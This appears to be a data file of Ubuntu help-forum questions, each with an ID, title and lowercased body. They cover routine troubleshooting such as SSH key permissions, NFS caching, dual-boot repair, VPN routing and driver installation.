_module_/home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-23-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
307872	cache nfs shares on local disk through virtual machine	i 'm running 64-bit ubuntu 12.04 and trying to set up fs-cache using cachefs as the backend on a virtual machine which is using ubuntu 12.04 32-bit after following this tutorial to use cachefilesd , how can i cache nfs shares on a local disk ? i setup the system for nfs sharing . when running the cachefilesd daemon , it will pass the startup procedure and the dmesg will state : fs-cache : cache `` mycache '' added ( type cachefiles ) . when running cat /proc/fs/nfsfs/volumes i will get : msali014 @ msali014-virtualbox : ~ $ cat /proc/fs/nfsfs/volumes nv server port dev fsid fsc v4 0a69031e 801 0:31 1de70f8892134adb yes however , when looking into the cache and graveyard directories , they remain empty and the fscache/stats changes minimally . msali014 @ msali014-virtualbox : ~ $ cat /proc/fs/fscache/stats fs-cache statistics cookies : idx=3 dat=0 spc=0 objects : alc=0 nal=0 avl=0 ded=1 chkaux : non=0 ok=0 upd=0 obs=0 pages : mrk=0 unc=0 acquire : n=3 nul=0 noc=0 ok=3 nbf=0 oom=0 lookups : n=0 neg=0 pos=0 crt=0 tmo=0 updates : n=0 nul=0 run=0 relinqs : n=1 nul=0 wcr=0 rtr=0 attrchg : n=0 ok=0 nbf=0 oom=0 run=0 allocs : n=0 ok=0 wt=0 nbf=0 int=0 allocs : ops=0 owt=0 abt=0 retrvls : n=0 ok=0 wt=0 nod=0 nbf=0 int=0 oom=0 retrvls : ops=0 owt=0 abt=0 stores : n=0 ok=0 agn=0 nbf=0 oom=0 stores : ops=0 run=0 pgs=0 rxd=0 olm=0 vmscan : nos=0 gon=0 bsy=0 can=0 ops : pend=0 run=0 enq=0 can=0 rej=0 ops : dfr=0 rel=0 gc=0 cacheop : alo=0 luo=0 luc=0 gro=0 cacheop : upo=0 dro=0 pto=0 atc=0 syn=0 cacheop : rap=0 ras=0 alp=0 als=0 wrp=0 ucp=0 dsp=0 the syslog file is as follows jun 13 14:03:08 msali014-virtualbox cachefilesd [ 2138 ] : about to bind cache jun 13 14:03:08 msali014-virtualbox cachefilesd [ 2138 ] : bound cache jun 13 14:03:08 msali014-virtualbox cachefilesd [ 2141 ] : daemon started jun 13 14:03:08 msali014-virtualbox cachefilesd [ 2141 ] : scan complete jun 13 14:03:38 msali014-virtualbox cachefilesd [ 2141 ] : refilling cull table jun 13 14:03:38 msali014-virtualbox cachefilesd [ 2141 ] : scan complete jun 13 14:04:08 msali014-virtualbox cachefilesd [ 2141 ] : refilling cull table jun 13 14:04:08 msali014-virtualbox cachefilesd [ 2141 ] : scan complete jun 13 14:04:38 msali014-virtualbox cachefilesd [ 2141 ] : refilling cull table i have the same settings for the cachefilesd on a desktop computer and the caching works as advertised , just not on the virtual machine . any help with this is appreciated
307876	how to search for files recursively into subdirectories	i am trying to look for all xml files in a particular directory and all sub-directories ( recursively ) inside it . ls -r *.xml is only listing files in the current directory . i am quite sure , the sub-folders themselves have several .xml files , but none are showing up . is this a configuration issue ?
307881	ssh public key authentication does n't work	i 'm having trouble setting up public key authentication for an ssh server on ubuntu server 12.04 ( a ) for authentication from an ubuntu server 13.04 ( b ) . what i 'm doing now ( i 'm trying to follow the instructions here ) : on b : create a new key with ssh-keygen -c `` '' , using no passphrase , writing to /.ssh/id_rsa - i do n't get any errors on b : run ssh-copy-id -i /.ssh/id_rsa user @ host-a - also , a success message on b : ssh -i /.ssh/id_rsa user @ host-a - i still have to enter my password for user @ host-a on a , i checked if the /.ssh/authorized_keys is modified after running ssh-copy-id , and this is the case . also , on both devices i added this to /etc/ssh/sshd_config : rsaauthentication yes pubkeyauthentication yes authorizedkeysfile /.ssh/authorized_keys does anyone know what might be the problem here ? here 's the tail of my /var/log/auth.log on machine a : jun 13 22:17:56 laptop-camil sshd [ 12344 ] : server listening on 0.0.0.0 port 22 . jun 13 22:17:56 laptop-camil sshd [ 12344 ] : server listening on : : port 22 . jun 13 22:18:27 laptop-camil sshd [ 12345 ] : authentication refused : bad ownership or modes for directory /.ssh jun 13 22:18:30 laptop-camil sshd [ 12345 ] : accepted password for camilstaps from 164.138.27.37 port 48407 ssh2 jun 13 22:18:30 laptop-camil sshd [ 12345 ] : pam_unix ( sshd : session ) : session opened for user camilstaps by ( uid=0 ) jun 13 22:18:35 laptop-camil sshd [ 12464 ] : received disconnect from 164.138.27.37 : 11 : disconnected by user jun 13 22:18:35 laptop-camil sshd [ 12345 ] : pam_unix ( sshd : session ) : session closed for user camilstaps jun 13 22:18:42 laptop-camil sshd [ 12516 ] : authentication refused : bad ownership or modes for directory /.ssh jun 13 22:18:44 laptop-camil sshd [ 12516 ] : connection closed by < host-b > [ preauth ]
307886	cant switch language back	i got ubuntu 13.04 32-bit , with gnome 3.8.2 , and unity installed too . two languages selected as input sources - english ( us ) and russian . keybind to change input methods is set and works okay . indicator in gnome top notification panel works good too . the problem : changing input method by keybind does not work properly - it changes only indicator in top panel and does not affect typing from keyboard . does not matter , which language is selected through keybind , typing from keyboard brings symbols only from english input method . but , if i change language from panel ( from en to ru , by example ) , everything works okay and i can type russian symbols . then i again change language , now by keybind ( to en ) , it works too , but only once , next usage of keybind does not affect input method , leaving only english input . in unity everything works , without any problems . sorry for bad english = (
307888	how do i change the font color in ubuntu software center	i ca n't seem to find a reasonable answer to this question . i looked at ubuntu tweak and it 's only for older versions of ubuntu . i have 12.4 lts .
307890	10.04 lts patches	i need a pointer to where i can download the latest patch set for 10.04 lts . also , a good pointer to the documentation for patch management under ubuntu would be very helpful .
307893	upstart bittorrent sync two configs for btsync	i want to write an upstart script for bittorrent sync that starts btsync like `` btsync -- config day.conf '' in the morning and restarts it with `` btsync -- config night.conf '' at night . this way , i would be able to limit the upload rate in the `` day.conf '' file and remove any limits in the `` night.conf '' file . i want to use cron to then start btsync with the right config file . i currently have in /etc/init/btsync.conf setuid patrick setgid patrick start on runlevel [ 2345 ] stop on runlevel [ 016 ] expect fork instance $ conf chdir /home/patrick/programs/btsync exec ./btsync -- config $ conf i can then start btsync with something like : sudo initctl start btsync conf=btsync-day.conf which i could put into /etc/crontab and it would work . but i think that using the instance stanza is not the right thing to do , as i am not running instances really . btsync can not be running multiple instances . also to stop the job , i have to stop it using the right conf= variable , but i would rather be able to just stop it without needing to specify the right instance . is there a better way to do this in upstart ?
307895	admin name appears twice if it asks for admin password . ubuntu 12.04 lts	i was trying to apply some given items at this page to secure my ubuntu 12,04 . after applying item number 4 ; my user name which is the only admin , appears twice if system asks for an admin password as seen below . how to revert it back to its original state . thank you . hejar
307896	ubuntu 13.04 networkmanager / dnsmasq shared connection ethernet reconnect loop	after rebooting my computer after the 13.04 do-release-upgrade networkmanager has been unable to set up a shared connection between my laptop and desktop . looking at /var/log/syslog i see that dnsmasq is most likely at fault here . ... jun 13 22:28:21 hatate dnsmasq [ 9290 ] : failed to create listening socket for 10.42.0.1 : address already in use jun 13 22:28:21 hatate dnsmasq [ 9290 ] : failed to start up ... jun 13 22:28:21 hatate networkmanager [ 1529 ] : < warn > dnsmasq exited with error : network access problem ( address in use ; permissions ; etc ) ( 2 ) jun 13 22:28:21 hatate networkmanager [ 1529 ] : < info > ( eth0 ) : device state change : activated - > failed ( reason 'sharing-start-failed ' ) [ 100 120 18 ] ... using netstat -nat i can see that i have nothing running on 10.42.0.1 so i have no idea what to do from here . any help is appreciated .
307898	ldap client login only works after logging out of local account	i 'm trying to login to an ubuntu vm using ldap credentials . i have followed an internal company wiki and gotten as far as a successful login . however , i can only login with ldap intermittently . most often , if i reboot the vm , i can not log in with ldap credentials . it passes the username/password , but hangs on a black screen . i then reboot , log in to the local account and check /var/log/auth.log . i read errors similar to the following : could not search ldap server - server is unavailable failed to bind to ldap server ldap : //hostname.our.server : ca n't contact ldap server i am able to ping hostname.our.server . now , if i run `` su myldapusername '' , i am prompted for my password and successfully switch . at this point i can sometimes log out of the local account and successfully log in to the ldap account . i ca n't explain why i can only intermittently complete the log in via ldap . i 'm guessing there is some kind of race condition . anyway , while i still have hair , i would appreciate any help you can offer . cheers , brad p.s . i suppose i should mention i 'm using ubuntu desktop 12.04 . for a hypervisor i have tried both vmware and virtualbox , in order to rule out any weird bridged networking problem .
307899	how do i boot from ubuntu on my usb drive so i can wipe the ubuntu file system on the hard drive ?	how do i boot from ubuntu on my usb drive so i can wipe the ubuntu file system on the hard drive ? i have ubuntu on an exterior hard drive and want to boot from that so i can wipe the internal hard drive on a dell system before i give it away . thanks !
307901	how do i assign magnet links to use qbittorrent ?	the key /desktop/gnome/url-handlers/magnet in gconf-editor is missing . how do i assign magnet links to use qbittorrent ? it would be really nice if it were easy to set url handlers . i always struggle with this when doing a fresh install . i would like to set subl : // to open sublime text 2 too . edit : i would like it to work regardless of the application i 'm using to activate the link . i 'm using chrome , but imo the os ( ubuntu ) should be handling links that an application does n't know how to handle - which it does , so how would one configure this ? edit2 : this post details how to make the text editor in vim handle vim : // urls , perhaps this can be applied to to magnet links . i.e create a desktop shortcut defining a mimetype handler then refreshing the cache . ( ca n't try right now as i 'm using 12.04 ) . http : //www.tkalin.com/blog_posts/using-console-vim-as-vim-protocol-handler-in-ubuntu
307907	can we manually throttle the bandwidth of a network interface ?	say i wish to have the interface eth0 to have a very low bandwidth . is it possible ? as may be evident from the question , i am trying to simulate a network with varying bandwidths . i am using virtualbox running ubuntu to simulate the hosts .
307912	what browser does ubuntu touch use ?	i was just wondering , what is the defualt web browser in ubuntu phone . i could n't find it anywhere on the internet .
307913	how to set up a parallel port printer in 12.04 ?	after the upgrade from 10.04 to 12.04 the parallel printer stopped working . it seems that that the parallel port is not detected . i did n't change anything in the bios and before it worked without problems . i followed the instructions of this page : https : //wiki.ubuntu.com/debuggingprintingproblems # parallel_port_printer $ lsmod | grep lp lp 17799 0 parport 46562 3 ppdev , lp , parport_pc $ lsmod | grep ppdev ppdev 17113 0 parport 46562 3 ppdev , lp , parport_pc $ lsmod | grep parport_pc parport_pc 32866 0 parport 46562 3 ppdev , lp , parport_pc $ dmesg | grep par [ 0.000000 ] booting paravirtualized kernel on bare hardware [ 0.000000 ] vt handoff : transparent vt on vt # 7 [ 0.515991 ] hpet0 : 8 comparators , 64-bit 14.318180 mhz counter [ 18.007169 ] type=1400 audit ( 1371154439.505:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=654 comm= '' apparmor_parser '' [ 18.007426 ] type=1400 audit ( 1371154439.505:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=654 comm= '' apparmor_parser '' [ 18.007575 ] type=1400 audit ( 1371154439.505:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=654 comm= '' apparmor_parser '' [ 18.007789 ] type=1400 audit ( 1371154439.505:5 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=716 comm= '' apparmor_parser '' [ 18.008101 ] type=1400 audit ( 1371154439.505:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=716 comm= '' apparmor_parser '' [ 18.008280 ] type=1400 audit ( 1371154439.505:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=716 comm= '' apparmor_parser '' [ 18.019011 ] ppdev : user-space parallel port driver [ 19.744248 ] type=1400 audit ( 1371154441.241:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=964 comm= '' apparmor_parser '' [ 19.744326 ] type=1400 audit ( 1371154441.241:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=965 comm= '' apparmor_parser '' [ 19.744676 ] type=1400 audit ( 1371154441.241:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=965 comm= '' apparmor_parser '' [ 19.744874 ] type=1400 audit ( 1371154441.241:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=965 comm= '' apparmor_parser '' $ ls -l /dev/lp* /dev/parport* ls : zugriff auf /dev/lp* nicht mรถglich : datei oder verzeichnis nicht gefunden ls : zugriff auf /dev/parport* nicht mรถglich : datei oder verzeichnis nicht gefunden $ ls -l /proc/sys/dev/parport/parport*/autoprobe* ls : zugriff auf /proc/sys/dev/parport/parport*/autoprobe* nicht mรถglich : datei oder verzeichnis nicht gefunden $ sudo cat /proc/sys/dev/parport/parport*/autoprobe* cat : /proc/sys/dev/parport/parport*/autoprobe* : datei oder verzeichnis nicht gefunden $ lpinfo -v network lpd network ipps network http network https network socket network ipp14 network ipp network beh direct scsi direct hp network smb direct hpfax $ /usr/lib/cups/backend/parallel $ sudo /usr/lib/cups/backend/parallel any ideas ?
307915	what are the differences between jails and chroot ?	i 'm currently trying to point out the finer details between chroot spaces and jails . and clear up some of the controversy in the phrase `` chroot jail . '' so far i have chroot defined simplistically as `` unix command that appears to change the root directory. `` is this an acceptable definition ? and how would the definition of a jail differ ?
307922	run vagrant up with highest virtualbox version	i 've already installed virtualbox version 4.1.18_ubuntu from this source : deb http : //download.virtualbox.org/virtualbox/debian quantal contrib apparently the above source was used to install virtualbox 4.2 which was automatically removed when i installed the vagrant . so , i suppose that the current installed version is from the default ubuntu source . when i installed the vagrant ( from the default ubuntu 12.10 source ) and tried to run my box with vagrant up i got this error message : vagrant has detected that you have a version of virtualbox installed that is not supported . please install one of the supported versions listed below to use vagrant : 4.0 , 4.1 is there any way to run vagrant with my virtualbox ? installing newest vagrant version could be also as a solution ( the current one : 1.0.3 ) . i tried : sudo apt-get purge virtualbox* virtualbox-4.2 vagrant and sudo apt-get install vagrant , it did n't help .
307923	ubuntu touch : ca n't change keyboard input	i 've tried to change keyboard input language . i 'm norwegian and missing the letters æ ø å . followed the method in release notes , but when i try to save after edit the osk ( /home/phablet/.config/maliit.org./server.conf ) i get error : `` .config/maliit.org./server.conf '' e212 : ca n't open file for writing '' i also get error when apt-get upgrade : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` nb_no : en '' , lc_all = ( unset ) , lang = `` nb_no.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory someone knows what i 've done wrong , and how to fix it ?
307924	new to ubuntu , how do i get drivers for my usb wifi lan adapter ?	so i have very little experience with linux , let alone ubuntu 13.04 . i reformatted an old desktop of mine to boot ubuntu 13.04 , upon which i will be using as a mini-server to host vpses . it will become a headless server that i will be putting in my closet when i finish configuring it . i will simply use vnc software to connect to it when need be . now , here 's my problem : the desktop does not have a built-in wifi adapter , so i purchased a linksys ae2500 dual-band wireless-n usb adapter . i bought this back when the desktop ran windows 7 . i was wondering where i should start to find any drivers , or anything really that will allow me to get this adapter working on ubuntu . note there is no internet connection to the desktop , and i ca n't connect it with an ethernet cord . i do have another laptop with internet if i need to download and transfer any files via flash drives . i am extremely inexperienced with linux and this project is one way i 'm trying to learn about it . i 'd appreciate it if any answers were given as if you 're teaching a child haha thanks in advanced !
307926	windows xp does n't go up after unubtu installation,	i must first admit that i 'm pretty new to this whole `` linux '' environment , so give me some slacks . : ) i 'm using win xp , with acronis true image . after i installed the ubuntu 12.04 version , the linux is up and running . when i power up my pc ( desktop ) . i receive a list of options to choose , and two of them are acronis and windows . when i press windows i get a nearly blank page , with only a mark blinking on the upper left side of the display , and there it 's stuck . when i press on acronis , i get a notification that states : '' non system disk , press any key '' and then it returns to the main list . what do you think ? is there a way to fix it ? how ? 10x a lot in advanced ,
307931	should i install ubuntu 12.04 or 13.04 ?	recently i have migrated from ubuntu 13.04 64 bits to 32 bits in my laptop because i was getting some trouble with some software . meanwhile , i have faced another problems with compatibility , with guitar pro 6 that i ca n't open after installing ( and i can made it work on ubuntu 12.04 in a virtual machine ) . should i downgrade to ubuntu 12.04 ? are there more programs available for ubuntu 12.04 than for 13.04 ?
307938	logitech c310 webcam not working well with guvcview and cheese	i just bought a new webcam , logitech c310 . it does n't work well with either guvcview or cheese with their default settings , under ubuntu 12.04 . the recorded video and audio are not synchronized in both guvcview and cheese . the sound lags behind the video . is the problem due to the webcam or guvcview and cheese ? i have n't been able to test the webcam with skype yet . not sure if the same synchronized problem will occur . what webcams do you recommend to work with ubuntu 12.04 ? i prefer one that can work well for online job interview . thanks !
307942	openvpn connect but nothing else	i have installed a vpn server on my synology ds413+ . i can connect but ca n't ping or do anything else . i think it has to do with the route but i do n't know how to change it . here is my output of route : without vpn : kernel-ip-routentabelle ziel router genmask flags metric ref use iface default alice.box 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 * 255.255.255.0 u 0 0 0 wlan0 with vpn : kernel-ip-routentabelle ziel router genmask flags metric ref use iface default 192.168.0.9 0.0.0.0 ug 0 0 0 tun0 ? ? ? . ? ? ? . ? ? ? . ? ? ? 192.168.1.1 255.255.255.255 ugh 0 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 tun0 192.168.0.0 192.168.0.9 255.255.255.0 ug 0 0 0 tun0 192.168.0.1 192.168.0.9 255.255.255.255 ugh 0 0 0 tun0 192.168.0.9 * 255.255.255.255 uh 0 0 0 tun0 192.168.1.0 192.168.0.9 255.255.255.0 ug 0 0 0 tun0 192.168.1.0 * 255.255.255.0 u 0 0 0 wlan0 the ? ? ? . ? ? ? . ? ? ? . ? ? ? is just my vpn server and just for security . i use ubuntu 13.04 and a lenovo x220i . i would be pleased if somebody could help .
307945	why does doing a restart , not restart ?	i press the power button on my laptop , press restart , but my computer only shuts off and does n't really restart . is there a way to fix this ?
307948	how can i get vlc to automatically play dvds when inserted ? running 13.04	i 'm trying to help and elderly disabled person play dvds as easy as possible - by inserting them ! i 'm running 13.04 . i set totem as the default app . but a couple dvds didnt play off the bat -- vlc generally better at decoding so i tried . however , setting open vlc as the action when a dvd is inserted in the appropriate settings does n't work . totem does launch but has more issues . i think i even set kaffeine which plays everything like vlc but did n't auto launch . my goal is 1 ) auto play by inserting dvd 2 ) smooth ejecting and changing of dvds 3 ) widest amount of dvd support i would use good ol ' totem but even though i have restricted extras installed i still get compatibility issues . thank you !
307949	virtualbox kernel package is not supported while install vagrant	i 'm installing the vagrant with sudo apt-get install . this error i got : ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... setting up virtualbox ( 4.1.18-dfsg-1ubuntu1.2 ) ... * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed . setting up vagrant ( 1.0.3-1 ) ... processing triggers for ureadahead ... setting up virtualbox-dkms ( 4.1.18-dfsg-1ubuntu1.2 ) ... loading new virtualbox-4.1.18 dkms files ... first installation : checking all kernels ... building only for 3.8.0-030800-generic building initial module for 3.8.0-030800-generic error ( dkms apport ) : kernel package linux-headers-3.8.0-030800-generic is not supported error ! bad return status for module build on kernel : 3.8.0-030800-generic ( x86_64 ) consult /var/lib/dkms/virtualbox/4.1.18/build/make.log for more information . * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed . setting up virtualbox-qt ( 4.1.18-dfsg-1ubuntu1.2 ) ... processing triggers for menu ... ubuntu 12.10 $ uname -a linux 3.8.0-030800-generic # 201302181935 smp tue feb 19 00:36:19 utc 2013 x86_64 x86_64 x86_64 gnu/linux
307951	how do i fix the weired skype noises	how to fix the weird skype noises on raring ? ( it sounds completly distorted i tried a guide from askubuntu.com so it ruined my pc so i reinstalled ubuntu but how do i fix the weird noises ? here it is : skype and vlc sounds sizzle/distorted/bad
307953	why do i get `` 404 not found '' errors updating ubuntu 11.04 ( or other old versions ) ?	whenever i am trying to install compiz config settings manager through synaptic package manager , it shows the following error : i have tried it through the terminal . but it also shows the following : this type of error occurs for other software installation . how can i install it success fully ?
307954	juju on aws t1.micro ( or other ) reserved instances	the smartest ( often ) way to run instances on aws is to buy `` reserved '' instances - for either one or three years . my goal here is to run the wordpress charm on t1.micro instances as per the default setup recommended ( 4 or 5 instances , for memory ) . it would make the most sense to use reserved instances , to ensure my costs are the lowest they can be . now , i have two issues : juju 0.7 ( i 've not tested the go version ) does n't like t1.micro instances and appears to lose contact with them after aws instantiates them . there are others reporting the same thing . if i 've pre-reserved a number of instances , how do i `` hard-code '' these into juju 's settings to ensure they are used in the environment , rather than `` randoms '' ? if i can crack the code on this , then i 'm off and running ! !
307961	how to get the latest firefox on 10.04 after eol ?	i have a 10.04 desktop that has firefox 13 installed . whenever a new version came out it was updating , but after switching the sources list to the archive sources for 10.04 end of life , apt-get claims that firefox is the latest version . my other 10.04 machines are running 17 . there was a ppa for the latest stable firefox , but i ca n't seem to find it any-more and some articles suggest it may have been discontinued ? what is the preferred way of keeping firefox updated on eol 10.04 ?
307964	how to install tidy to xampp on ubuntu 13.04	i followed this article : http : //hoball.wordpress.com/2009/09/29/html-tidy-on-linux-under-xampp/ to install tidy on my xampp , and i got below error message when restart my xampp : warning : php startup : unable to load dynamic library '/opt/lampp/lib/php/extensions/no-debug-non-zts-20090626/tidy.so ' - /opt/lampp/lib/php/extensions/no-debug-non-zts-20090626/tidy.so : wrong elf class : elfclass64 in unknown on line 0 i 'm using ubuntu 13.04 x86_64 , how can i compile 32bit tidy ? or is it possible to download tidy 32bit module from somewhere ? thank you ! =================== i finally solved this problem by installing a 32bit ubuntu virtual box and do the compile in it .
307966	how to compile software in ubuntu without ever using the command line	every time you want to build a software from source , you need to enter a lot of commands in the terminal . is there a way to compile software using a graphical user interface ?
307969	what does the dd command do ?	someone rooted my box and executed a command , help ! dd if=/dev/urandom of=.huehuehue what does this command do ?
307973	messed up with sysctl settings on precise . is there a way to restore defaults ?	in a quest to improvise internet speed on my slow broadband , i messed up with the below tcp settings in sysctl.conf after following instructions from here . i edited the sysctl.conf , performed `` sysctl -p '' and also performed a full restart ! unfortunately i did not take any backup of the file or default settings . now , my internet speed is even slower than what it was . is there a way now to set all these kernel settings to their defaults without performing a total re-installation of ubuntu ? ( commenting them in sysctl.conf is not helping ) here are the settings : net.ipv4.tcp_timestamps=0 net.core.rmem_max = 8388608 net.core.wmem_max = 8388608 net.core.rmem_default = 16384 net.core.wmem_default = 16384 # 4096 16384 905792 # 4096 16384 64240 net.ipv4.tcp_wmem = 4096 16384 4194304 net.ipv4.tcp_rmem = 8192 87380 4194304 net.ipv4.tcp_mem = 4096 16384 8388608 # net.ipv4.route.flush=1
307976	installed ubuntu on previous windows machine with partitioned drive	my machine had windows installed with a hd partitioned in two parts . one for the system and one for my precious files . i 've decided to see what 's new on ubuntu 13.04 , so i installed it . but when i was installing , i choose the `` replace windows 8 with ubuntu '' option and setting the lvm option , thinking that it would replace the first partition with ubuntu and leave the second partition alone . after that , i realized the mistake i 've made . the second partition is lost and now the system has only one whole partition . are all my files lost ? is there any way to retrieve them ? thanks in advance and sorry for the noobiness . i just had no idea what lvm was before setting it .
307981	having windows 7 and want to install a new ubuntu 13.04	i have windows 7 in my laptop and i want to start installing ubuntu 13.04 . do i have to format all my partitions in windows before i can start installing ubuntu ? if not , then it means i 'll be installing ubuntu on my 'primary partition ' which is c : . what about the other partitions i have in windows 7 . i have these three partitions in my windows . my question is if i install ubuntu into one of these partitions and will i lose those two partitions ?
307984	scanner wifi connectivity lost after upgrade to ubuntu 13.04	like many other posters here this seems to be a bug . i too have upgraded from ubuntu 12.10 to 13.04 , and my canon mp980 all-in-one printer worked perfectly prior to the upgrade . now i get a no scanners detected message when i start simple scan . any suggestions anyone ?
308006	how to hide all the verbose or login tty7 on bootup ?	i 'm a newbie in ubuntu and now there 's a problem i tried many ways but still ca n't make it , so i 'm now here asking for help . what i want to make is a os that bootup and show graphic theme ( plymouth ) and then to graphic terminal , what i mean is ... like desktop , login tty7 automatically , without any verbose after the theme . i 'm now using a ubuntu server cause it 's the smaller the better , and i write something in ~/.profile and some other files to make a autologin root and auto start 'startx ' , so , after the plymouth theme , it 's in tty1 , it logs into root and startx and goto tty7 automatically , but , there 's some verbose . i 've tried to chmod 000 for utmp , btmp and lastlog in /var/log/ and delete /etc/issue and /etc/update-motd.d , but there 's still few verbose left . last login - how can i hide it ? after the startx it shows : x.org x server - how to hide it ? if it 's impossible or too difficult to hide them , can i login tty7 on bootup , just like ubuntu desktop ? ( i only installed xorg , no other desktop things shall be installed ) if possible , how can i hide the verbose when shutdown or reboot ? i tried to add clear above exit 0 in rc.local , it does n't work ! thanks very much for anyone who can help ! i hide last login successfully , according to http : //www.cyberciti.biz/faq/howto-display-clear-last-login-information/ but xorg startup verbose needs to be hidden . same with shutdown verbose . i finally make it another way , i mean , hide all the welcome information according to http : //ubuntuforums.org/showthread.php ? t=1449020 hope it will be of use to someone like me .
308011	how to install ubuntu on two different hard drives	i have a laptop with a uefi boot system with two hard drives installed . the first hard drive is a 35gb ssd , and the second is a 500gb mechanical drive . in terms of installation i have no problem . i figured it out from the start , only changing the way that ubuntu boots . i want to put my system files on the ssd and my /home directory on the other drive , so that the ssd wo n't fill up too quickly . please tell me how to do this .
308012	is ubuntu touch compatible with my tablet ?	i have recently procured a proline tablet of which the specs can be confirmed at http : //www.proline.co.za/our-products/tablet/ak888-13/technical-specs/ # product . as can be noted from the specs the tablet currently has android 4.1 ( jelly bean ) as operating system and as i use ubuntu 11.01 as my laptop operating system i 'd like to convert the tablet to run ubuntu touch . will this work ?
308015	ca n't mount ntfs disk with the certain set of permissions ( root 's ones )	i need to mount an ntfs disk with the certain permission and for an user alex be able to have the same as root would have . here is my file /etc/fstab /dev/sda2 /media/win_disk ntfs-3g rwx , locale=en_us.utf8 0 0 when i try to mount it , it says an error occurred while accessing '421.8 gib hard disk ( ntfs ) ' , the system responded : the requested operation has failed . : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sda2 on /media/win_disk how do i get rid of it ?
308018	installing ubuntu 12.04.02 in uefi mode	i 've got a new laptop with pre-installed windows 8 and since the beginning of the week i 've been trying to install ubuntu 12.04 without success . today , after turning off uefi ( using `` compatibility support module '' or simply `` csm '' ) i managed to install ubuntu using this url found on ubuntu official website : https : //help.ubuntu.com/community/uefi . i 've run the boot-repair tool while running linux . tried to use the automatic repair and everything went fine and i 've restarted the machine . then i turned uefi on again and the first surprise was : the initial screen was not windows boot loader any more but grub ; i really do n't want that . and the second surprise : although i can boot windows ( i am using it right now ) , i ca n't initiate linux . after choosing one of linux options in the grub screen , absolutely nothing happens . here 's the link generated by the boot repair application : http : //paste.ubuntu.com/5763591/ if possible i would really appreciate some help in ( 1 ) setting windows boot loader screen as the default and ( 2 ) install and run linux ( with dual boot windows ) with uefi and fastboot on on this machine . if you have a tutorial that you think i can follow to solve these problems i would also be very pleased . update june , 16th hello , i appreciate your answer . in fact , first , i 've installed ubuntu with uefi turned off and everything worked well . then , while using ubuntu , i 've followed the steps on the link that i 've pasted on the last post in order to convert the ubuntu installation from legacy to uefi mode . after i did that , the system could n't be loaded any more . when i turn on my notebook , the first screen that cames to me is the grub2 screen . in that screen i have two options for ubuntu , and 4 for windows . i can load windows with no problems , but when i try to load ubuntu ( recovery or normal mode ) , the system simply does not respond . it shows me just a black screen and then i have to restart the notebook through the power button . i 've tried loading ubuntu this way with and without uefi and i have the same result.the point is : i want now to uninstall linux and clean the partition that i 've reserved to the installation in order to install it again and use the os with legacy mod . but how can i do that without loading the os ? thank your very much , vitor .
308021	samsung recovery solution corrupted	after i installed ubuntu 12.04 lts in my samsung laptop with windows 7 pre installed , i cant access my samsung recovery solution , i need to factory reset my windows 7 . any help ?
308022	cgal library installation !	i am running ubuntu 12.04 and i want to install the cgal library on my desktop for my study purpose.i have tried its installation process for 1000 times ( trying all different ways ) but still i am unable to make it work . this is cmake output . any help is appreciated , since i am stuck on this since last two months . thanks in advanced .
308030	i ca n't boot from usb stick	i copied the iso file and tried to boot from usb to install ubuntu 13.04 . did n't work : ( then tried after all the files in the iso image copied to the usb stick . also did n't work '' missing operation system '' was the message i 've installed ubuntu 12.04 alongside of windows vista and i 've removed it . thank you
308038	can not load windows 7 from grub 2 menu	i originally had windows 7 installed in my system then decided to install ubuntu 13.04 alongside it . when the system boots i get the grub menu but when i select windows 7 the grub menu just reappears ( but ubuntu loads just fine ) . i did find a number of threads with similar problems but the boot repair output for those threads appeared to be different from mine and i did not want to risk further problems by applying an incorrect `` solution '' . i would really appreciate any help . here is the output from boot repair : link : complete boot repair output sample output : boot info script e7fc706 + boot-repair extra info [ boot-info 3june2013 ] ============================= boot info summary : =============================== = > windows 7/8/2012 is installed in the mbr of /dev/sda . sda1 : __________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda2 : __________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda3 : __________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : no errors found in the boot 